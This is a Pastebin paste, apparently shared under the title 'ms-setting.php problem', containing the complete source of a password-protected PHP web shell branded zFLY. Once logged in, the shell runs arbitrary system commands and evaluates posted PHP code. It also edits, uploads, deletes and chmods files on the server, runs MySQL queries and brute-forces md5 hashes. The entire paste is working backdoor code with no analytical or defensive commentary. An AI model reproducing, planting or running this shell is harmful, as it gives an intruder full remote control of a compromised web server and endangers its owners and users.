troykd

ms-setting.php problem

Jul 23rd, 2012
138
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3. error_reporting(0);
  4.  
  5. $password = "d48da8a4f42521d202a2a389e2b73ee4"; // You can put a md5 string here too, for plaintext passwords: max 31 chars.
  6.  
  7. $me = basename(__FILE__);
  8. $cookiename = "ENF7ZT35Z5ni";
  9.  
  10.  
  11. if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh?
  12. {
  13.  
  14. if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5.
  15. {
  16. $_POST['pass'] = md5($_POST['pass']);
  17. }
  18.  
  19. if($_POST['pass'] == $password)
  20. {
  21. setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in
  22. }
  23. reload();
  24. }
  25.  
  26.  
  27.  
  28. if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password))
  29. {
  30. login();
  31. die();
  32. }
  33. //
  34. //Do not cross this line! All code placed after this block can't be executed without being logged in!
  35. //
  36.  
  37. if(isset($_GET['p']) && $_GET['p'] == "logout")
  38. {
  39. setcookie ($cookiename, "", time() - 3600);
  40. reload();
  41. }
  42. if(isset($_GET['dir']))
  43. {
  44. chdir($_GET['dir']);
  45. }
  46.  
  47.  
  48. $pages = array(
  49. 'cmd' => 'Execute Command',
  50. 'eval' => 'Evaluate PHP',
  51. 'mysql' => 'MySQL Query',
  52. 'chmod' => 'Chmod File',
  53. 'phpinfo' => 'PHPinfo',
  54. 'md5' => 'md5 cracker',
  55. 'headers' => 'Show headers',
  56. 'logout' => 'Log out'
  57. );
  58.  
  59. //The header, like it?
  60. $header = '<html>
  61. <title>'.getenv("HTTP_HOST").'</title>
  62. <head>
  63. <style>
  64. td {
  65. font-size: 12px;
  66. font-family: verdana;
  67. color: #33FF00;
  68. background: #000000;
  69. }
  70.  
  71. #d {
  72. background: #003000;
  73. }
  74. #f {
  75. background: #003300;
  76. }
  77. #s {
  78. background: #006300;
  79. }
  80. #d:hover
  81. {
  82. background: #003300;
  83. }
  84. #f:hover
  85. {
  86. background: #003000;
  87. }
  88. pre {
  89. font-size: 10px;
  90. font-family: verdana;
  91. color: #33FF00;
  92. }
  93. a:hover {
  94. text-decoration: none;
  95. }
  96.  
  97.  
  98. input,textarea,select {
  99. border-top-width: 1px;
  100. font-weight: bold;
  101. border-left-width: 1px;
  102. font-size: 10px;
  103. border-left-color: #33FF00;
  104. background: #000000;
  105. border-bottom-width: 1px;
  106. border-bottom-color: #33FF00;
  107. color: #33FF00;
  108. border-top-color: #33FF00;
  109. font-family: verdana;
  110. border-right-width: 1px;
  111. border-right-color: #33FF00;
  112. }
  113.  
  114. hr {
  115. color: #33FF00;
  116. background-color: #33FF00;
  117. height: 5px;
  118. }
  119.  
  120. </style>
  121.  
  122. </head>
  123. <body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900">
  124. <table width=100%><td id="header" width=100%>
  125. <p align=right><b>[zFLY] [<a href="'.$me.'">Home</a>] ';
  126.  
  127. foreach($pages as $page => $page_name)
  128. {
  129. $header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] ';
  130.  
  131. }
  132. $header .= '<br><hr>'.show_dirs('.').'</td><tr><td>';
  133. print $header;
  134.  
  135. $footer = '<tr><td><hr><center>&copy; <a href="http://">ZflY</a> & <a href="http://">z3t</a></center></td></table></body></head></html>';
  136.  
  137.  
  138. //
  139. //Page handling
  140. //
  141. if(isset($_REQUEST['p']))
  142. {
  143. switch ($_REQUEST['p']) {
  144.  
  145. case 'cmd': //Run command
  146.  
  147. print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>";
  148. if(isset($_REQUEST['command']))
  149. {
  150. print "<pre>";
  151. execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that?
  152. }
  153. break;
  154.  
  155.  
  156. case 'edit': //Edit a fie
  157. if(isset($_POST['editform']))
  158. {
  159. $f = $_GET['file'];
  160. $fh = fopen($f, 'w') or print "Error while opening file!";
  161. fwrite($fh, $_POST['editform']) or print "Couldn't save file!";
  162. fclose($fh);
  163. }
  164. print "Editing file <b>".$_GET['file']."</b> (".perm($_GET['file']).")<br><br><form action=\"".$me."?p=edit&file=".$_GET['file']."&dir=".realpath('.')."\" method=POST><textarea cols=90 rows=15 name=\"editform\">";
  165.  
  166. if(file_exists($_GET['file']))
  167. {
  168. $rd = file($_GET['file']);
  169. foreach($rd as $l)
  170. {
  171. print htmlspecialchars($l);
  172. }
  173. }
  174.  
  175. print "</textarea><input type=submit value=\"Save\"></form>";
  176.  
  177. break;
  178.  
  179. case 'delete': //Delete a file
  180.  
  181. if(isset($_POST['yes']))
  182. {
  183. if(unlink($_GET['file']))
  184. {
  185. print "File deleted successfully.";
  186. }
  187. else
  188. {
  189. print "Couldn't delete file.";
  190. }
  191. }
  192.  
  193.  
  194. if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes']))
  195. {
  196. print "Are you sure you want to delete ".$_GET['file']."?<br>
  197. <form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST>
  198. <input type=hidden name=yes value=yes>
  199. <input type=submit value=\"Delete\">
  200. ";
  201. }
  202.  
  203.  
  204. break;
  205.  
  206.  
  207. case 'eval': //Evaluate PHP code
  208.  
  209. print "<form action=\"".$me."?p=eval\" method=POST>
  210. <textarea cols=60 rows=10 name=\"eval\">";
  211. if(isset($_POST['eval']))
  212. {
  213. print htmlspecialchars($_POST['eval']);
  214. }
  215. else
  216. {
  217. print "print \"Yo Momma\";";
  218. }
  219. print "</textarea><br>
  220. <input type=submit value=\"Eval\">
  221. </form>";
  222.  
  223. if(isset($_POST['eval']))
  224. {
  225. print "<h1>Output:</h1>";
  226. print "<br>";
  227. eval($_POST['eval']);
  228. }
  229.  
  230. break;
  231.  
  232. case 'chmod': //Chmod file
  233.  
  234.  
  235. print "<h1>Under construction!</h1>";
  236. if(isset($_POST['chmod']))
  237. {
  238. switch ($_POST['chvalue']){
  239. case 777:
  240. chmod($_POST['chmod'],0777);
  241. break;
  242. case 644:
  243. chmod($_POST['chmod'],0644);
  244. break;
  245. case 755:
  246. chmod($_POST['chmod'],0755);
  247. break;
  248. }
  249. print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue'].".";
  250. }
  251. if(isset($_GET['file']))
  252. {
  253. $content = urldecode($_GET['file']);
  254. }
  255. else
  256. {
  257. $content = "file/path/please";
  258. }
  259.  
  260. print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod:
  261. <input type=text name=chmod value=\"".$content."\" size=70><br><b>New permission:</b>
  262. <select name=\"chvalue\">
  263. <option value=\"777\">777</option>
  264. <option value=\"644\">644</option>
  265. <option value=\"755\">755</option>
  266. </select><input type=submit value=\"Change\">";
  267.  
  268. break;
  269.  
  270. case 'mysql': //MySQL Query
  271.  
  272. if(isset($_POST['host']))
  273. {
  274. $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error());
  275. mysql_select_db($_POST['dbase']);
  276. $sql = $_POST['query'];
  277.  
  278.  
  279. $result = mysql_query($sql);
  280.  
  281. }
  282. else
  283. {
  284. print "
  285. This only queries the database, doesn't return data!<br>
  286. <form action=\"".$me."?p=mysql\" method=POST>
  287. <b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br>
  288. <b>Username:<br><input type=text name=username value=\"root\" size=10><br>
  289. <b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br>
  290. <b>Database:<br><input type=text name=dbase value=\"test\" size=10><br>
  291.  
  292. <b>Query:<br></b<textarea name=query></textarea>
  293. <input type=submit value=\"Query database\">
  294. </form>
  295. ";
  296.  
  297. }
  298.  
  299. break;
  300.  
  301. case 'createdir':
  302. if(mkdir($_GET['crdir']))
  303. {
  304. print 'Directory created successfully.';
  305. }
  306. else
  307. {
  308. print 'Couldn\'t create directory';
  309. }
  310. break;
  311.  
  312.  
  313. case 'phpinfo': //PHP Info
  314. phpinfo();
  315. break;
  316.  
  317.  
  318. case 'rename':
  319.  
  320. if(isset($_POST['fileold']))
  321. {
  322. if(rename($_POST['fileold'],$_POST['filenew']))
  323. {
  324. print "File renamed.";
  325. }
  326. else
  327. {
  328. print "Couldn't rename file.";
  329. }
  330.  
  331. }
  332. if(isset($_GET['file']))
  333. {
  334. $file = basename(htmlspecialchars($_GET['file']));
  335. }
  336. else
  337. {
  338. $file = "";
  339. }
  340.  
  341. print "Renaming ".$file." in folder ".realpath('.').".<br>
  342. <form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST>
  343. <b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br>
  344. <b>To:<br><input type=text name=filenew value=\"\" size=10><br>
  345. <input type=submit value=\"Rename file\">
  346. </form>";
  347. break;
  348.  
  349. case 'md5':
  350. if(isset($_POST['md5']))
  351. {
  352. if(!is_numeric($_POST['timelimit']))
  353. {
  354. $_POST['timelimit'] = 30;
  355. }
  356. set_time_limit($_POST['timelimit']);
  357. if(strlen($_POST['md5']) == 32)
  358. {
  359.  
  360. if($_POST['chars'] == "9999")
  361. {
  362. $i = 0;
  363. while($_POST['md5'] != md5($i) && $i != 100000)
  364. {
  365. $i++;
  366. }
  367. }
  368. else
  369. {
  370. for($i = "a"; $i != "zzzzz"; $i++)
  371. {
  372. if(md5($i == $_POST['md5']))
  373. {
  374. break;
  375. }
  376. }
  377. }
  378.  
  379.  
  380. if(md5($i) == $_POST['md5'])
  381. {
  382. print "<h1>Plaintext of ". $_POST['md5']. " is <i>".$i."</i></h1><br><br>";
  383. }
  384.  
  385. }
  386.  
  387. }
  388.  
  389. print "Will bruteforce the md5
  390. <form action=\"".$me."?p=md5\" method=POST>
  391. <b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br>
  392. <b>Characters:</b><br><select name=\"chars\">
  393. <option value=\"az\">a - zzzzz</option>
  394. <option value=\"9999\">1 - 9999999</option>
  395. </select>
  396. <b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br>
  397. <input type=submit value=\"Bruteforce md5\">
  398. </form><br>*: if set_time_limit is allowed by php.ini";
  399. break;
  400.  
  401. case 'headers':
  402. foreach(getallheaders() as $header => $value)
  403. {
  404. print htmlspecialchars($header . ":" . $value)."<br>";
  405.  
  406. }
  407. break;
  408. }
  409.  
  410. }
  411. else //Default page that will be shown when the page isn't found or no page is selected.
  412. {
  413.  
  414. $files = array();
  415. $directories = array();
  416.  
  417. if(isset($_FILES['uploadedfile']['name']))
  418. {
  419. $target_path = realpath('.').'/';
  420. $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
  421.  
  422. if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
  423. print "File:". basename( $_FILES['uploadedfile']['name']).
  424. " has been uploaded";
  425. } else{
  426. echo "File upload failed!";
  427. }
  428. }
  429.  
  430.  
  431.  
  432.  
  433.  
  434. print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>";
  435. if ($handle = opendir('.'))
  436. {
  437. while (false !== ($file = readdir($handle)))
  438. {
  439. if(is_dir($file))
  440. {
  441. $directories[] = $file;
  442. }
  443. else
  444. {
  445. $files[] = $file;
  446. }
  447. }
  448. asort($directories);
  449. asort($files);
  450. foreach($directories as $file)
  451. {
  452. print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
  453. }
  454.  
  455. foreach($files as $file)
  456. {
  457. print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
  458. }
  459. }
  460. else
  461. {
  462. print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>";
  463. }
  464.  
  465. print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\">
  466. <input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" />
  467. <input type=\"submit\" value=\"Upload File\" />
  468. </form></td><td><form action=\"".$me."\" method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value=\"".realpath('.')."\"><input type=submit value=\"Change Directory\"></form></td>
  469. <tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form>
  470. </td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td>
  471. </table>";
  472.  
  473.  
  474. }
  475.  
  476.  
  477. function login()
  478. {
  479. print "<table border=0 width=100% height=100%><td valign=\"middle\"><center>
  480. <form action=".basename(__FILE__)." method=\"POST\"><b>Password?</b>
  481. <input type=\"password\" maxlength=\"35\" name=\"pass\"><input type=\"submit\" value=\"Login\">
  482. </form>";
  483. }
  484. function reload()
  485. {
  486. header("Location: ".basename(__FILE__));
  487. }
  488.  
  489. function get_execution_method()
  490. {
  491. if(function_exists('passthru')){ $m = "passthru"; }
  492. if(function_exists('exec')){ $m = "exec"; }
  493. if(function_exists('shell_exec')){ $m = "shell_ exec"; }
  494. if(function_exists('system')){ $m = "system"; }
  495. if(!isset($m)) //No method found :-|
  496. {
  497. $m = "Disabled";
  498. }
  499. return($m);
  500. }
  501.  
  502. function execute_command($method,$command)
  503. {
  504. if($method == "passthru")
  505. {
  506. passthru($command);
  507. }
  508.  
  509. elseif($method == "exec")
  510. {
  511. exec($command,$result);
  512. foreach($result as $output)
  513. {
  514. print $output."<br>";
  515. }
  516. }
  517.  
  518. elseif($method == "shell_exec")
  519. {
  520. print shell_exec($command);
  521. }
  522.  
  523. elseif($method == "system")
  524. {
  525. system($command);
  526. }
  527.  
  528. }
  529.  
  530. function perm($file)
  531. {
  532. if(file_exists($file))
  533. {
  534. return substr(sprintf('%o', fileperms($file)), -4);
  535. }
  536. else
  537. {
  538. return "????";
  539. }
  540. }
  541.  
  542. function get_color($file)
  543. {
  544. if(is_writable($file)) { return "green";}
  545. if(!is_writable($file) && is_readable($file)) { return "white";}
  546. if(!is_writable($file) && !is_readable($file)) { return "red";}
  547.  
  548.  
  549.  
  550. }
  551.  
  552. function show_dirs($where)
  553. {
  554. if(ereg("^c:",realpath($where)))
  555. {
  556. $dirparts = explode('\\',realpath($where));
  557. }
  558. else
  559. {
  560. $dirparts = explode('/',realpath($where));
  561. }
  562.  
  563.  
  564.  
  565. $i = 0;
  566. $total = "";
  567.  
  568. foreach($dirparts as $part)
  569. {
  570. $p = 0;
  571. $pre = "";
  572. while($p != $i)
  573. {
  574. $pre .= $dirparts[$p]."/";
  575. $p++;
  576.  
  577. }
  578. $total .= "<a href=\"".basename(__FILE__)."?dir=".$pre.$part."\">".$part."</a>/";
  579. $i++;
  580. }
  581.  
  582. return "<h2>".$total."</h2><br>";
  583.  
  584. }
  585. print $footer;
  586.  
  587. // Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-)
  588. exit();
  589. ?>
RAW Paste Data